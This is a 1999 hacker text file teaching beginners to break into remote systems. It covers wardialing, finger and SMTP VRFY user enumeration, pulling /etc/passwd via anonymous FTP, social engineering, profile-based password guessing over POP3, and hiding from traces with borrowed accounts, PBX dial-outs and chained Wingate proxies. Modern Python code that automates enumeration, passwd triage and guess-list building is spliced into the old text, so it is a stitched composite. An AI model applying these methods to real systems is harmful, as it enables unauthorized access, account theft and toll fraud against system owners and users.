***********************************************************************
                    THE MOB BOSS's GUIDE TO HACKING
                           by The Mob Boss
***********************************************************************

I. Introduction

Brief History of Hacking

There is no set date on which you can say hacking was born. You may mark it with the first computer system being developed, or with the birth of the UNIX operating system at AT&T. One thing is sure: hacking has been around for a long time. Maybe not in the conventional way you think of it, but it has been around all right.

I would like to start with the early 80's, though. This is after the birth of UNIX, a time when people were running systems we may make fun of today. Although the hardware was primitive, this is what I consider the prime days of hacking, long before AOL and even the World Wide Web were made available to the general idiots, whoops, I mean public. In those days information was spread through systems called BBSs, or Bulletin Board Systems. These systems offered chat, message boards, and files. You had more experienced hackers and phreakers then (a phreaker is a phone hacker). People shared their knowledge of the various computers they found, loop numbers, phone systems, and other such interesting things. If you really want a nostalgic point of view on it, I suggest you read the Anarchist Cookbook. It still holds some info that would help you today, but most of the texts, the original ones, date back to the eighties and were actually distributed on BBSs.

Back in those days there were only two ways to access systems remotely. One was through Telenet, a packet-switched network of computers from around the world with dialups in most major cities. The other way is a personal favorite of mine, wardialing. This is the process of dialing every phone number in an exchange (the first three digits of your seven-digit phone number) looking for computer carriers. There are many things found while wardialing besides computers as well.
Loop numbers (very rare these days), PBXs, test numbers, fax machines, and other interesting numbers can all be found by simply picking up your phone or having your wardialer do it for you. My personal favorite among wardialers is the DOS-based ToneLoc, available throughout the web. Now wardialing is just plain fun for me these days, but back in yesteryear that was the only way to hack. The interesting computer numbers were also traded among the people on the BBSs. Although I wasn't there for the grand old days of hacking, I have first-hand accounts from friends who were, and from texts I have read. One piece that really shows how much fun those days were was a series of articles called Diary of a Hacker. These things were not as uncommon as you would think; I personally know someone I met off the net who was a sysop on a BBS in those days. If you are new, though, keep in mind hacking has changed a lot since those days.

What is Hacking?

This question is one I have thought about and have been asked about many times. My definition of a hacker is someone who is very knowledgeable about various computer systems and how to work them in ways your everyday user is ignorant of. A hacker is someone who pushes a system beyond its limits. This is a person who knows what's what and is ethical in his work as well. If you are new and haven't read an article on ethics then I suggest you do so. My article on ethics is available on my website at http://mobboss.dragx.cx . Finally, a hacker is someone who uses the computer knowledge he has to gain even more knowledge.

What Hacking Isn't

This is where we separate the smart hackers of the future from the wannabes. I know Hollywood and the media may have given you some ideas about hacking that you liked. For the most part everything in the movies and on television is complete bullshit. Forget everything you saw in Hackers, Goldeneye, and Mission Impossible.
These are all exaggerations, although the evil hacker Boris in Goldeneye was pretty cool. Hacking isn't about stealing yourself stuff, it's not about taking revenge, and it is most certainly not about looking cool. God only knows you look like hell after spending a weekend behind the old terminal trying to get into a certain server. Also, no matter what your friends at school have said, using a trojan horse to get into somebody's Windows box is just plain pointless. If you do it, don't brag about it and don't spend too much time on it, since it is nothing but a waste of valuable time. If you are still interested then continue reading.

Hacking as of April, 1999

Just to clue you new guys in to what's going on in the hacking community these days: most of your hacking and phreaking info is on the web now. There are still a few BBSs left, some even with telnet access over the net to save on that long distance bill. Usenet has become a wasteland of flaming for the most part, although you still find some knowledgeable people among the ridiculous posts. Web-based chat such as AOL, Yahoo, and anything else like it has no knowledgeable hackers, take my word for it. You will find nothing but big-talking idiots there. Most systems aren't as weak as they used to be, so forget logging into remote computers without a password or as root:root like you may have read in an old article. Even techniques from the early nineties are no good these days, one being the PHF exploit. It is also very rare to find an unshadowed password file these days, so don't count on it. Hacking is as hard as it ever was, so don't get any false ideas of glory.

II. First Steps

The Library

Believe it or not, the library is most likely the best place to start your hacking career. Although it may appear useless, it can be one of your best friends. Your local library carries a wealth of information for the aspiring hacker or phreaker.
First off, among the many lousy books, there are many computer books on subjects ranging from various operating systems to telecommunications. I suggest you take out some books on DOS, UNIX, and Windows 95/98/NT. I also suggest you learn about TCP/IP and networking. Read as much as you can. Also at the library you will find many interesting directories such as the Haines Criss-Cross Directory, which lists phone numbers by address, numbers by name, and all those vice versa. You may also decide to use the computers at the library, either for anonymity while hacking or just for the pure pleasure of messing around with a LAN.

Search Engines

Now some of you brighter ones already know this, but for the mentally less fortunate I will go over the wonderful powers of the almighty search engine. After looking in the library for books on hacking you most likely turned up nothing; that's why I didn't tell you to look that up. To find hacking info we head for the net. My personal favorite is www.altavista.com; I find it has the most complete listing among all the ones you see these days. Some things you want to look up are hacking, phreaking, hacking texts, and computer security. Among these topics you will find good information and other things that are complete garbage. Just sort through that info and pick what you are most interested in. I do suggest, though, that you don't bother with proggies (point-and-click programs). They are usually nothing more than a waste of time. The good stuff will come in the form of text files. Read everything you can get your hands on.

IRC

Now IRC can be fun or it can be dumb; it's what you make of it. If you go on there occasionally to ask a couple of questions, share some info, or just hang out for a bit while you're bored, everything is fine. If you go on there all the time just to argue, you're wasting your valuable time. Your best bet is to stay relatively impartial.
Why bother with flame wars that end up as nothing but wasted time that could have been better spent? Most people on there are bored and have nothing better to do than bother other people, so before you sink to their level just think about that.

USENET

USENET has become a little worse in the past few years. It has a lot of spam and a lot of dumb posts. Once in a while, though, you will see some intelligent Q & A, and it's refreshing to see a break from the usual garbage. Now if you use newsgroups correctly this is a good way to get a question answered within a day or two. It's all about not asking the wrong question. Read the group's FAQs before posting, and in any question related to hacking stay away from AOL, Hotmail, and "How do I hack?" questions. These will just result in some flaming, that's it.

Fitting In

This can be easy or this can be hard; it all depends on your personality. Some people just have a way about them that will piss off anyone. First thing is not to act like a newbie; attaching "I am a newbie" to each question is dumb. That's not to say you should act like you know more than you do either. There is a thin line you should walk. Also, like I mentioned before, there are some questions that should not be asked: questions asking for someone to teach you to hack, and questions about Hotmail and AOL, are looked down upon. Not to mention people feel anyone who pays the high fees AOL charges for lousy service is a complete moron, so if you are using AOL expect some teasing for it. Another thing: many hackers don't like Windows and will laugh at you for running it. I feel both Linux and Windows come in handy, so I always have some sort of Linux access along with my Windows computer. I really suggest you watch the conversations wherever you're chatting or posting to get a sense of what is going on. Above all, try not to piss off anyone.

III. Getting Started

How do I find good boxes to mess with?
Well, when you talk to some people this seems to be the biggest problem. I personally never found it a problem, but I figured I should include this for those who do have trouble with it. Interesting computers, as well as phones for those aspiring phreaks, can come from everyday life. You may notice a local business is online and wonder what the system is and what it does. When you're out and about, keep your eyes open for things that may prove interesting. For instance, while checking out some good UNIX books (which by now I hope you all have done) I took it upon myself to sit down at one of their computers and mess around, trying to get a non-Internet computer online so I could check my mail. In the process a nasty librarian came over to me and reprimanded me. I of course played innocent, but when I got home I said to myself, "Wonder what these people are holding on to so tightly". So I fired up my computer, headed for the Internet, found their website, then looked at the IP address their card catalog was on, and from there found a nice old UNIX V system, which surprised me since all their user computers are running Windows 95. In the end, although I did not mess with it too seriously, I found it allowed mail relaying, which meant I could forge mail from them, not to mention it was a good server which did not show my IP in the header.

Now if I did not find it on the Internet I would turn to the old-fashioned way of finding computers, among other things: exchange scanning. This is usually done with the aid of a program called a wardialer. This is simply the process of dialing every number in an exchange in hopes of finding a carrier. I was shocked at the cool things you can find while doing this. I am currently thinking of writing a separate article on this since it's a very broad subject. The fact of the matter is that scanning is illegal in some areas and can get you in hot water with your local phone company, which I have had some close calls with.
The message here is: be careful. Look up some info on this before trying it. As for other methods of finding computers, there are programs like wardialers which scan a large range of IPs for servers. I have never used one of these before and quite frankly have no desire to either. I will say, though, that a friend of mine found some interesting things by doing this. Now one very good way to find good things is to look at where e-mails come from by reading the full headers. If somebody mailbombed you or forged e-mail to you, look on the bright side: they pretty much showed you an anonymous e-mail server. The final way, and by far my favorite, is to look up a city or area code and explore its computers and phone numbers. Pick your home town if you like, although I do not recommend it. My favorite spots are the towns I used to live in and also vacation spots of the past or future. Being creative is what will help you. That's what hacking is all about.

Making the Connection

Now this is probably review for most everyone, but for the few who have posted asking this, here it is. Let's say we wanted to hack target.edu, a university in Fakeville, USA. To connect we want to telnet to port 23, the telnet port. This is where we'd be presented with a login screen, and if you want to hack an account, that's the place to begin. The first way, and by far the best, is to telnet out of a UNIX shell account you already have somewhere, by giving this command at the shell prompt:

    telnet target.edu 23

That would give you the login screen. Now let's suppose you can't get a UNIX shell account, nor do you have any kind of UNIX on your computer. In the case that you're running Windows we will use the telnet client shipped with Windows. We get to our telnet client by simply going to Start --> Run --> telnet. From there we would go to Connect --> Remote System.
For host we put in target.edu and for port, 23. For term type I use VT100, but it's personal preference I suppose. If we wanted to telnet to another daemon besides the default telnet port we would type in the port that daemon runs on. Here's a freebie: port 25 is SMTP, the Simple Mail Transfer Protocol (for info on it download my article "The Wonderful and Evil World Of E-mail", available on my website). I strongly suggest you get yourself a UNIX port list, available on most hacking sites on the web.

Analyzing

This is where the bulk of the work comes in: finding out everything you can without actually entering a username and password. Remember while gathering info you don't want to make the system administrator too nervous, or he may pick up the good old telephone and have a little chat with your ISP. ISPs are quick to throw you off, especially the big services. The first thing to do is find out what ports a computer has open; for those who don't know, ports are where the various services listen. There are two ways to do this: you can run a port scanner, or you can port surf by hand, connecting to one port at a time. If you want to keep things quiet your best bet is to do it by hand. If you automate it you're asking for trouble, because all those connects will show up in the logs. Be clear about what "quiet" means, though: a connect to any port that has a daemon behind it can be logged whether you typed it or a program did; what gives a scanner away is dozens of connects in a few seconds, which is what stands out in a log and what a scan detector is built to catch. If you don't give a rat's ass about the system operator knowing, then start up the port scanner and go take a walk. When you come back you will be looking at a list of ports. When you're looking at ports a handy port list will come in good use. That should be numero uno on your equipment list. After a while you won't even need it. That time is not now, though; you are still inexperienced, so I suggest printing it off and keeping it in a spot where you won't lose it. Now there are many services which will give you info, but my favorite is port 79, finger.
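The user enumeration this section describes, done in code: one finger query per connection on port 79, then the same names checked with VRFY on the SMTP daemon on port 25. This is an added example and not code from the original article. Since there is no real target.edu to point it at, it stands up two constructed fake services on loopback (their account list, banner text and log format are all made up for the demo) and has them record every query in FAKE_LOG, which shows the trail the "quiet" approach still leaves in a target's logs. The fakes answer VRFY with 250 or 550; a real server that answers 252 is treated as inconclusive.

```python
"""Finger (79/tcp) and SMTP VRFY (25/tcp) username enumeration against two
constructed fake services on loopback.  Added example, not the article's
code; FAKE_USERS, the banners and the FAKE_LOG format are made up."""
import socket
import threading

FAKE_USERS = {"john": "John Q. Public", "mary": "Mary Roe", "root": "Charlie Root"}
FAKE_LOG = []  # constructed: what the target's own daemons could log


def readline(sock):
    """One LF-terminated line from a socket, a byte at a time (simple, not fast)."""
    buf = b""
    while not buf.endswith(b"\n"):
        ch = sock.recv(1)
        if not ch:
            break
        buf += ch
    return buf


def serve_fake(handler):
    """Run handler(conn, addr) per connection on an ephemeral loopback port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, addr = srv.accept()
            with conn:
                handler(conn, addr)

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def fake_fingerd(conn, addr):
    """Fake fingerd (RFC 1288 shape): one query per connection, answer, close."""
    name = readline(conn).strip().decode(errors="replace")
    FAKE_LOG.append(f"fingerd: query '{name}' from {addr[0]}")
    if name in FAKE_USERS:
        conn.sendall(f"Login: {name}\r\nName: {FAKE_USERS[name]}\r\n".encode())
    else:
        conn.sendall(f"finger: {name}: no such user.\r\n".encode())


def fake_smtpd(conn, addr):
    """Fake SMTP daemon that still honours VRFY: 250 known, 550 unknown."""
    conn.sendall(b"220 target.edu ESMTP (constructed banner)\r\n")
    while True:
        line = readline(conn).decode(errors="replace").strip()
        verb, _, arg = line.partition(" ")
        if not line or verb.upper() == "QUIT":
            return                                      # client is done
        if verb.upper() != "VRFY":
            conn.sendall(b"250 target.edu ok\r\n")      # HELO etc.: just accept
            continue
        FAKE_LOG.append(f"smtpd: VRFY {arg} from {addr[0]}")
        if arg in FAKE_USERS:
            conn.sendall(f"250 {FAKE_USERS[arg]} <{arg}@target.edu>\r\n".encode())
        else:
            conn.sendall(f"550 {arg}... User unknown\r\n".encode())


def finger_user(host, port, name):
    """One finger query; heuristic: a real user comes back with a 'Login:' line."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(name.encode() + b"\r\n")
        reply = b""
        while chunk := s.recv(4096):                    # fingerd closes after answering
            reply += chunk
    low = reply.decode(errors="replace").lower()
    return "login:" in low and "no such user" not in low


def smtp_vrfy(host, port, names):
    """One session, one VRFY per name.  250/251 valid, 550/551/553 unknown,
    anything else inconclusive (252 = server refuses to verify, the usual
    modern answer).  Assumes single-line replies, which VRFY answers are."""
    status = {b"250": "valid", b"251": "valid",
              b"550": "unknown", b"551": "unknown", b"553": "unknown"}
    result = {}
    with socket.create_connection((host, port), timeout=5) as s:
        readline(s)                                     # 220 banner
        s.sendall(b"HELO probe.example\r\n")
        readline(s)
        for name in names:
            s.sendall(f"VRFY {name}\r\n".encode())
            result[name] = status.get(readline(s)[:3], "inconclusive")
        s.sendall(b"QUIT\r\n")
    return result


def enumerate_users(candidates):
    """Both probes against the constructed target: (confirmed logins, admin's log)."""
    FAKE_LOG.clear()
    fport, sport = serve_fake(fake_fingerd), serve_fake(fake_smtpd)
    found = {n for n in candidates if finger_user("127.0.0.1", fport, n)}
    vrfy = smtp_vrfy("127.0.0.1", sport, candidates)
    found |= {n for n, st in vrfy.items() if st == "valid"}
    return sorted(found), list(FAKE_LOG)


if __name__ == "__main__":
    print(enumerate_users(["john", "mary", "paul", "joe", "root"]))
```

Compare the confirmed list with FAKE_LOG when it runs: every probe is one line the administrator can read, typed by hand or not, and the VRFY pass adds one line per name on top of the finger pass.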
With finger you can gain a wealth of information such as usernames, info on users (perfect for social engineering), and times when last logins occurred. So take a look at whether port 79 is open. It has become rarer, but by no means is it extinct. I still find it often. Keep in mind that when you telnet to port 79 by hand you will not see what you're typing, and you only get one query per connection before it disconnects you. Some of the first things you can try with finger are common names: john, mary, paul, joe, jane, and so on. This can sometimes produce quite a few valid usernames. Along with that, depending on the version of finger and how trusting they are, you can get other info. Full names, addresses, phone numbers, e-mail addresses and things along that line are out there for the taking. You can also try some other things with finger, such as fingering root, the superuser account on UNIX systems. This will tell you if he is currently on or when he last logged in. It may also give you some other interesting details. Try fingering accounts like bin, system, manager, @, 0, @target.com, and anything else you can think of. I suggest you turn on logging in your telnet client so that you can review all this info at another time and figure out what will be useful.

Another little thing that can help you figure out valid usernames without filling up those login logs is the SMTP daemon on port 25, most likely Sendmail. Using the command VRFY you can check whether a certain user exists on the system: a 250 reply means the address is known, a 550 means it isn't. Some things to try are common names, guest, and anonymous. Be aware that a lot of mail servers are now configured to refuse VRFY and answer every query with 252 ("cannot verify, but will accept the message"), which tells you nothing either way. Make friends with SMTP; it will be quite helpful in some cases of getting into systems.

You may also want to check whether they allow anonymous FTP. If they do, log in as you would to any anonymous FTP server (if you are not familiar with FTP, go to a search engine and look up "FTP help"). If you get in, I suggest nosing around the /etc directory. This is where the password file lives on a UNIX system.
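What to do with a passwd file once anonymous FTP has handed it to you, as an added example that is not from the original text: parse it, tell apart the x placeholder (the hash lives in /etc/shadow, which you did not get), locked accounts (a field starting with * or !), an empty field (no password at all, the best find of the lot) and an actual hash in either the 13-character traditional crypt form or the newer $id$salt$hash form, and list every UID 0 account, since each one of those is root whatever it is called. SAMPLE_PASSWD is constructed and its hash fields are only shaped like hashes. The cracking of whatever comes out as crackable is left to a real cracker (John the Ripper, for instance) and a dictionary.

```python
"""Triage of a passwd file pulled over anonymous FTP.  Added example, not the
article's code; SAMPLE_PASSWD is constructed and its hash fields are made-up
strings in the right shape, not real hashes."""
import re

SAMPLE_PASSWD = """\
root:x:0:0:Charlie Root:/root:/bin/sh
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:!!:2:2:daemon:/sbin:/sbin/nologin
guest::500:500:Guest Account:/home/guest:/bin/sh
john:Nb1hjD6fR8z2c:501:100:John Q. Public:/home/john:/bin/csh
mary:$1$saltsalt$0123456789abcdefghijkl:502:100:Mary Roe:/home/mary:/bin/sh
toor:x:0:0:Alternate root:/root:/bin/sh
this line is garbage
"""

DES_CRYPT = re.compile(r"[./0-9A-Za-z]{13}")     # traditional: 2-char salt + 11-char hash
MODULAR_CRYPT = re.compile(r"\$[0-9a-z]+\$.+")   # $1$ MD5, $5$/$6$ SHA, $2b$ bcrypt, ...


def classify(field):
    """What the password field of one passwd entry actually is."""
    if field == "":
        return "empty"       # no password at all: worse than any weak hash
    if field == "x":
        return "shadowed"    # hash is in /etc/shadow, readable by root only
    if field.startswith(("*", "!")):
        return "locked"      # no valid hash starts this way; the account cannot log in
    if MODULAR_CRYPT.fullmatch(field) or DES_CRYPT.fullmatch(field):
        return "hash"        # crackable offline with a dictionary
    return "unknown"


def parse_passwd(text):
    """Entries for well-formed 7-field lines; malformed lines are counted, not guessed at."""
    entries, malformed = [], 0
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            malformed += 1
            continue
        entries.append({"user": fields[0], "pw": fields[1], "uid": int(fields[2]),
                        "gecos": fields[4], "shell": fields[6]})
    return entries, malformed


def triage(text):
    """Summarise what is worth doing with the file."""
    entries, malformed = parse_passwd(text)
    by_class = {}
    for e in entries:
        by_class.setdefault(classify(e["pw"]), []).append(e["user"])
    return {
        "crackable": by_class.get("hash", []),
        "passwordless": by_class.get("empty", []),
        "shadowed": by_class.get("shadowed", []),
        "locked": by_class.get("locked", []),
        "uid0": [e["user"] for e in entries if e["uid"] == 0],  # every one is root
        "malformed": malformed,
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_PASSWD).items():
        print(f"{key:13} {val}")
```

On the constructed file this reports john and mary as crackable, guest as having no password at all, and root plus toor as UID 0; root and toor are shadowed, so without /etc/shadow there is nothing to crack for them.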
Download everything in /etc and take a look at it. The one you really want to look at is passwd. Now I know you may have read old texts and think you will just download it, run a password cracker on it and then have superuser access. Fat chance. Most password files are shadowed these days, meaning that where the password hash should be you find a placeholder such as x or * instead, and the real hashes sit in /etc/shadow, which only root can read. (A field that starts with $ is not a placeholder; that is a hash in the newer format, so that entry is one you can crack.) If by some freak chance you do get one that isn't shadowed, get hold of a UNIX password cracker and a dictionary file and use those to crack the password file. This is doubtful, but it doesn't hurt to try. While in FTP check out everything you have access to. Sometimes you'll find some info that could be useful, not to mention I have heard some morons upload stuff they would otherwise attach to an e-mail to anonymous FTP since it is quicker. I never came across that, but I bet it would be nice to. And the last thing to do before you log off is to see if you have write access. Try to upload something to the anonymous FTP area; if it works, note that, because it may be possible to do some interesting things with it. More likely you will get an access denied message.

Exploitation

OK, you gathered all the info you could on this server. You analyzed it over and over. You know every port that is open and you know what service it is running. You know each piece of software and the version they are running. Once you have all this info there are many ways this can go. Usually your break-ins to systems come one of two ways. Number one, and my favorite, is user and system administrator stupidity. Number two, and also a very exciting thing, is problems with the software and misconfigurations. Let's talk about the first way. Back in the old days this was the main way to get in, the easiest at least. You'd call up some clueless user and say that his system was going to crash if you didn't get in there to correct a bug.
Now that the world is shifting towards a more computer-literate society people are wising up to these things, but that's not to say there aren't still gullible people out there. If you don't believe me, look at the hype about the last major virus, Melissa, which was nothing more than a Word macro that mailed itself to the first fifty addresses in each victim's address book and swamped a few mail servers. People panicked over this. This just goes to show you that people get scared when they don't understand something. There are some papers out there on social engineering, but let me say right now that no article will make you an experienced bullshit artist. That only comes with practice.

Besides getting the users to tell you their password, you can attempt to guess it. You already have some info on the person. You should know their gender and name from finger information. Also, if you checked whether they have a personal web page, you may know everything about that person from their favorite cereal to what they hate in society. Take this info and create a list of common passwords this person might choose. When you consider your subject, remember that people pick what fits them: the cheerful receptionist is going to pick words like love and honey, while the system operator who hasn't seen daylight in a month is going to pick something cruder. This may sound funny, but nearly everyone I know picks a password that says something about them. When you make your list you have to consider your target. Once you have your list together you are going to attempt to brute force the password, meaning educated guessing. If you know they have e-mail on the system, I also suggest you do your guessing through port 110, POP3. POP, the Post Office Protocol, doesn't disconnect you after three bad tries the way the login prompt does, so you get through your list faster and leave fewer login-prompt entries behind. Don't confuse that with being unlogged: a POP daemon can log every failed login too, so a long list still leaves a long trail. When you do this you had better be using one of the protection methods listed below. No matter what people tell you, jail is no fun.
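Building the guess list the paragraph above describes, as an added example that is not the author's code: PROFILE is a constructed stand-in for what finger and a personal page gave away, and the mangling passes (bare word, capitalised, word plus number, leet) are assumptions about what people do, ordered so the cheapest and most likely guesses go first. The des_truncate switch covers one thing worth knowing if the hashes turn out to be traditional DES crypt: only the first eight characters of a password count there, so a longer guess is the same guess as its eight-character prefix and there is no point sending it twice.

```python
"""Targeted guess list from leaked profile data.  Added example, not the
article's code; PROFILE is constructed and the mangling rules are the usual
ones, chosen here, not the author's."""
import itertools

PROFILE = {                     # constructed: what finger plus a homepage leaked
    "login": "jsmith",
    "first": "John",
    "last": "Smith",
    "interests": ["fishing", "corvette"],
    "years": ["1975", "99"],    # birth year, graduation year, ...
}

LEET = str.maketrans("aeios", "43105")


def base_words(profile):
    """The words a person actually reaches for: name parts and hobbies, lowercased."""
    words = [profile["login"], profile["first"], profile["last"],
             profile["first"] + profile["last"], profile["last"] + profile["first"],
             *profile["interests"]]
    return [w.lower() for w in words]


def candidates(profile, des_truncate=False):
    """Ordered, de-duplicated guesses: bare words first (cheapest, most likely),
    then capitalised, then word+number, then leet.  Each pass is a separate
    sweep so the probable guesses are all tried before any mangled ones.
    des_truncate=True: traditional DES crypt ignores everything past the 8th
    character, so guesses are cut to 8 and the duplicates that creates dropped."""
    out, seen = [], set()

    def add(word):
        if des_truncate:
            word = word[:8]
        if word and word not in seen:
            seen.add(word)
            out.append(word)

    words = base_words(profile)
    for w in words:
        add(w)
    for w in words:
        add(w.capitalize())
    for w, suffix in itertools.product(words, ["1", "123", *profile["years"]]):
        add(w + suffix)
    for w in words:
        add(w.translate(LEET))
    return out


if __name__ == "__main__":
    print(candidates(PROFILE))
    print("DES-truncated:", candidates(PROFILE, des_truncate=True))
```

The list is deliberately short: against a live login or POP3 prompt every guess is a log line on the target, so the point of the profile is to need few guesses, not to generate thousands.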
As I said before, there is a second method, which is a little more advanced and by far more practical. This is finding exploits in the software or services a server is running. The best example is Sendmail, the SMTP daemon. This piece of work has had so many holes it's not even funny. I strongly suggest you read up on Sendmail exploits, because vulnerable versions are very common to find. Throughout the years Sendmail bugs have compromised root, leaked password files, and caused other such security problems. If your target server is running Sendmail I suggest you check with either www.rootshell.com or some sort of search engine to see if its version is an exploitable one (the version is in the 220 banner it sends when you connect to port 25). Other daemons which have fallen prey are IMAP, fingerd (as if giving out user info wasn't enough), and POP (not limiting the number of bad logins sound safe to you?). Check up on all the software versions and see what you turn up. You see, it's all about how much you can learn, how much information you have. When you check out a system always keep your eyes open. Now one of the weird and crazy things you have to do is THINK! There is no complete textbook method to hacking. No secret codes or methods that will always compromise every system. This is an important thing to remember. As for exploits, besides checking with rootshell.com I also suggest you subscribe to any security mailing lists you can find. Keep up to date, because new techniques come out every day.

What To Do Once You're In

OK, you were able to get into a system; either you have a user or an administrator account. Depending on the system, both may be very interesting. Once you are in, you hopefully understand how to get around in the system. If you don't, then I recommend you find out what the hell you are doing before you mess something up. Commands like help and man will get you around, but further help can always be obtained by searching online. Look around and see what you have access to.
Take a look at what directories you have access to and whether you have read or write access. Also check to see what e-mail is lying around. You may even have access to a web directory. Now you have access to many things and you are very powerful at this point. Something that runs rampant with newbies is a surge of all that power, and they become destructive. Dance, sing, and rejoice, but do not screw things up without thinking it through. This is where ethics come in; you have to be responsible or you are no better than the media stereotypes. So as a final word on it: be careful.

IV. Protection

*67

This is one of the simplest and easiest ways to start protecting yourself, yet so many hackers and phreakers don't get it. For instance, the guy who spread the Melissa virus thought he was being slick because he was using a stolen AOL account to do it. Yet he didn't even make it difficult for AOL to trace him by dialing in with *67. Remember most ISPs keep records of where the call came from. When you are dialing anything that isn't toll-free you should most definitely use it. With the widespread use of Caller ID it has become a real necessity. *67 is free to use, so why not always use it? It only takes three extra seconds at most out of your life, so be smart and use it. This is not to say that it will be the one thing to save your ass; it won't. It just makes it a little bit tougher. Now if you are calling a toll-free number (800, 888, or 877) don't expect *67 to help. They have something called ANI (Automatic Number Identification), which gives them your number whether you *67 or not, because it is delivered by the phone company for billing and is separate from the Caller ID service that *67 blocks. As a precaution, though, do yourself a favor and dial it anyway.

Calling Cards

Everyone has had experience with prepaid calling cards and knows how they work. These little babies are quite handy when it comes to hacking and phreaking. One reason is that there is nothing tying the card to you.
The second, though, is that most of the time it won't show your home phone number, since you're dialing out of the company that owns the calling card. Using these cards can be an added piece of protection, but please remember the calling card company keeps logs, and if requested it is possible to trace the call back to the phone you used, so your best bet is to use this with the other methods we are talking about today.

PBXs

This is one of the best ways to protect yourself and get free calls at the same time. A PBX, Private Branch Exchange, is a phone switch set up in offices so that the company doesn't have to pay for a ton of lines; instead it has a few lines going in and out, and those are on the PBX. You know when you're at school and you have to press nine to get an outside line? Well, that's a PBX. Sometimes these PBXs have outside access (DISA, Direct Inward System Access) so their employees can call in and dial out without getting charged. Usually you will find one of these while scanning, and it will identify itself by a long tone or a distant dial tone. These are for the most part guarded by a code. For some in-depth info on hacking these I suggest you do a search for "PBX hacking". Still use some other protection methods in conjunction with this.

Borrowed Accounts

Alone this method is worthless, because they will trace it back to the phone line if you do anything really bad. But if you do some mild hacking and use this with some other methods it can be quite good. You don't have to worry whether you will get kicked off your ISP since it's not really yours anyway. It can also be used to impersonate other people on IRC if you have reason to. If you plan to be doing something, don't do it with your own account, because when they check the logs they will see your name, address, and phone number, and that will be it. So as always, be cautious.

Public Terminals

Now you will either love or hate this method. It seems most public places are getting public terminals. Libraries, schools, airports, you name it, they are starting to offer them.
These can offer good things such as anonymity, but there are drawbacks. This is the outside world we are talking about. You will have to deal with nosy people; librarians are a real pain (school librarians are the worst). If you use a public terminal there is a good chance there will be security in place that will prevent you from doing a lot of things, and this goes double if you are doing stuff at school. So although you have the anonymity, hiding behind the innocent who use the computer to chat on Yahoo! or AOL, try not to draw too much attention to yourself while doing this, or people will be on your back about doing anything.

Wingates

These are one of the best methods of protection while hacking on the Internet. WinGate is a proxy package for Windows, and older installations were left in a configuration that lets anyone on the Internet connect through them. They are abundant and easy to find, either by scanning or by looking at the bans on Undernet for exploitable Wingates. They are used by telnetting in (port 23) and getting a prompt like

    Wingate>

From this you type in a server and port number like this:

    Wingate> target.com 23

That will telnet you to target.com, and if you want added protection, telnet to another Wingate first and telnet on from that. You can string together several Wingates, and the target then sees only the last one's address. This is time-consuming, but it's worth it to keep you out of jail. Keep in mind, though, that a proxy only hides you from the target: whoever runs each Wingate can log every connection that passes through it, so the chain is only as good as its least-watched hop.

Outdials

These are a thing of the past, but supposedly there are still some around. I will say the alt.2600 FAQ's outdial list doesn't work, so don't waste your time. Outdials are used to dial out of UNIX systems, meaning you can dial anonymously and for free to one of the few BBSs still around or to a computer dialup on the other side of the country. If you hack a shell and it has a program called Kermit you are in luck, because you will be able to do this. If you really want to hunt down an outdial, get a text on it. Remember, on the Internet you have information as fast as you can type, so just look it up.

V. Conclusion

Behavior

If you have read through this and you are new, you have probably gained quite a lot of information, and hopefully I have piqued your interest a bit. No one is going to go out and hack for you, so if you really are dedicated then get out there and do it. As you get out into the cyberworld, be aware that no one likes an asshole, so act with integrity and smarts. Try to be nice even to those ignorant types asking for punters. Try to explain to them that that's not hacking, and what hacking is. If you can't, just tell them to get lost. Just try to maintain some of those manners mommy and daddy taught you and things will be fine.

Closing

I bid you good luck in your hacking career; may it be long and bust-free. Use your head in all situations and listen to the advice I have given you. As a last piece of advice, check out phreaking, phone hacking. The skills you learn come in handy for hacking. Last but not least, have fun and learn something; that's what this is all about. If you didn't like this article I couldn't care less. Get all my texts and other information you are looking for at my website http://mobboss.dragx.cx

By The Mob Boss
Co-edited by TheGuy

This has been a publication written by THE MOB BOSS; he is in no way responsible for the accuracy of, or results from the use of, the info in this article. Anything done is done totally at the user's discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only.

THE MOB BOSS copyright 1999 all rights reserved